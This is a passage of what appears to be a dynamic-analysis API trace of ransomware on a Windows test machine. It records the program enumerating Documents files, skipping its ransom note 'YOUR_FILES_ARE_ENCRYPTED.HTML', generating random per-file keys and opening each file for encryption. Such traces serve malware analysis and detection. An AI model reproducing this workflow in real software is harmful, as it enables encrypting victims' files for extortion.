param_1="CA") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="CF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd9a, param_2="%02X" | out: param_1="BF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="5B") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="00") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="CF") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="4B") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="1D") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="18") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="C1") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="A7") returned 2 [0166.928] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="71") returned 2 [0166.929] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\KfOTPMS8Hg.xlsx" [0166.929] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.929] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0166.948] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="lil9-3r", cAlternateFileName="")) returned 1 [0166.948] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r") returned 41 [0166.948] GetProcessHeap () returned 0x270000 [0166.948] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0166.948] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r" [0166.948] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*" [0166.948] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x151515, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0166.948] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fc6cfc0, ftCreationTime.dwHighDateTime=0x1d7d746, ftLastAccessTime.dwLowDateTime=0xaadc1070, ftLastAccessTime.dwHighDateTime=0x1d7e714, ftLastWriteTime.dwLowDateTime=0xaadc1070, ftLastWriteTime.dwHighDateTime=0x1d7e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x151515, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0166.949] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7541820, ftCreationTime.dwHighDateTime=0x1d7dcd4, ftLastAccessTime.dwLowDateTime=0xd79c8350, ftLastAccessTime.dwHighDateTime=0x1d7e5bc, ftLastWriteTime.dwLowDateTime=0xd79c8350, ftLastWriteTime.dwHighDateTime=0x1d7e5bc, nFileSizeHigh=0x0, nFileSizeLow=0xb442, dwReserved0=0x151515, dwReserved1=0x0, cFileName="8giA-dTTiYC1.doc", cAlternateFileName="8GIA-D~1.DOC")) returned 1 [0166.949] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc") returned 58 [0166.949] lstrcmpW (lpString1="8giA-dTTiYC1.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.949] PathFindExtensionW (pszPath="8giA-dTTiYC1.doc") returned=".doc" [0166.949] lstrlenW (lpString=".doc") returned 4 [0166.949] PathFindExtensionW (pszPath="8giA-dTTiYC1.doc") returned=".doc" [0166.949] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.949] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\8gia-dttiyc1.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.950] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=46146) returned 1 [0166.950] GetProcessHeap () returned 0x270000 [0166.950] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.951] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6E") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="46") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="1D") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="63") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F0") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="45") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="18") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="52") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9A") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="A4") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="F0") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A2") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="AC") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="98") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B7") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E3") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="D3") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="9B") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="08") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="81") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A8") returned 2 [0166.951] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="C0") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="3F") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E7") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A4") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="EB") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A1") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="FD") returned 2 [0166.952] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="08") returned 2 [0166.952] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\8giA-dTTiYC1.doc" [0166.953] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.953] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.957] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b9f5760, ftCreationTime.dwHighDateTime=0x1d7d920, ftLastAccessTime.dwLowDateTime=0x13d7d4c0, ftLastAccessTime.dwHighDateTime=0x1d7dd46, ftLastWriteTime.dwLowDateTime=0x13d7d4c0, ftLastWriteTime.dwHighDateTime=0x1d7dd46, nFileSizeHigh=0x0, nFileSizeLow=0xc16c, dwReserved0=0x151515, dwReserved1=0x0, cFileName="emzcTg-B_FsWzZV.pptx", cAlternateFileName="EMZCTG~1.PPT")) returned 1 [0166.957] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx") returned 62 [0166.957] lstrcmpW (lpString1="emzcTg-B_FsWzZV.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.958] PathFindExtensionW (pszPath="emzcTg-B_FsWzZV.pptx") returned=".pptx" [0166.958] lstrlenW (lpString=".pptx") returned 5 [0166.958] PathFindExtensionW (pszPath="emzcTg-B_FsWzZV.pptx") returned=".pptx" [0166.958] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.958] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\emzctg-b_fswzzv.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.962] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=49516) returned 1 [0166.962] GetProcessHeap () returned 0x270000 [0166.962] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.963] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="3B") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="A1") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="70") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="FE") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="ED") returned 2 [0166.963] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="52") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="5A") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="04") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="A9") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="B0") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9F") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="A4") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="62") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="96") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="B1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="75") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="76") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="83") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C1") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2D") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="ED") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="BB") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AA") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6C") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A7") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D4") returned 2 [0166.964] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="47") returned 2 [0166.965] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="3C") returned 2 [0166.965] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="06") returned 2 [0166.965] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\emzcTg-B_FsWzZV.pptx" [0166.965] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.965] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.975] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec7dc200, ftCreationTime.dwHighDateTime=0x1d7d998, ftLastAccessTime.dwLowDateTime=0x2aa4aac0, ftLastAccessTime.dwHighDateTime=0x1d7e110, ftLastWriteTime.dwLowDateTime=0x2aa4aac0, ftLastWriteTime.dwHighDateTime=0x1d7e110, nFileSizeHigh=0x0, nFileSizeLow=0x1ebb, dwReserved0=0x151515, dwReserved1=0x0, cFileName="gBnhtCOAvLr0Ffw.doc", cAlternateFileName="GBNHTC~1.DOC")) returned 1 [0166.975] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc") returned 61 [0166.975] lstrcmpW (lpString1="gBnhtCOAvLr0Ffw.doc", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.975] PathFindExtensionW (pszPath="gBnhtCOAvLr0Ffw.doc") returned=".doc" [0166.975] lstrlenW (lpString=".doc") returned 4 [0166.975] PathFindExtensionW (pszPath="gBnhtCOAvLr0Ffw.doc") returned=".doc" [0166.975] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.975] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\gbnhtcoavlr0ffw.doc"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.976] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=7867) returned 1 [0166.976] GetProcessHeap () returned 0x270000 [0166.976] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.977] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="E5") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="42") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="7B") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="1D") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A8") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="83") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="44") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="CA") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="26") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B3") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="93") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="46") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="27") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="67") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="E1") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="82") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="9E") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A4") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="72") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AD") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="39") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D3") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="F8") returned 2 [0166.977] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="E6") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="17") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="E7") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="00") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="81") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="38") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="35") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="4B") returned 2 [0166.978] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0166.978] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\gBnhtCOAvLr0Ffw.doc" [0166.979] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.979] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0166.987] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91120430, ftCreationTime.dwHighDateTime=0x1d7e5b4, ftLastAccessTime.dwLowDateTime=0xd6086530, ftLastAccessTime.dwHighDateTime=0x1d7e6c1, ftLastWriteTime.dwLowDateTime=0xd6086530, ftLastWriteTime.dwHighDateTime=0x1d7e6c1, nFileSizeHigh=0x0, nFileSizeLow=0x729c, dwReserved0=0x151515, dwReserved1=0x0, cFileName="I8HYT6gle-d_.csv", cAlternateFileName="I8HYT6~1.CSV")) returned 1 [0166.987] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv") returned 58 [0166.987] lstrcmpW (lpString1="I8HYT6gle-d_.csv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0166.987] PathFindExtensionW (pszPath="I8HYT6gle-d_.csv") returned=".csv" [0166.987] lstrlenW (lpString=".csv") returned 4 [0166.987] PathFindExtensionW (pszPath="I8HYT6gle-d_.csv") returned=".csv" [0166.987] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0166.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" (normalized: "c:\\users\\5alr3u30d3\\documents\\lil9-3r\\i8hyt6gle-d_.csv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0166.988] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=29340) returned 1 [0166.988] GetProcessHeap () returned 0x270000 [0166.988] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0166.989] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="51") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9D") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C0") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="8F") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="95") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="05") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="FE") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="29") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="76") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="1A") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D1") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="65") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1C") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="20") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="C0") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9E") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B8") returned 2 [0166.989] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="B0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B4") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="6E") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="FD") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="5D") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="FD") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="09") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="82") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="55") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A0") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="49") returned 2 [0166.990] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="2C") returned 2 [0166.991] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Documents\\lil9-3r\\I8HYT6gle-d_.csv" [0166.991] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0166.991] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0167.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c0dab0, ftCreationTime.dwHighDateTime=0x1d7dffb, ftLastAccessTime.dwLowDateTime=0xa83198f0, ftLastAccessTime.dwHighDateTime=0x1d7e0c9, 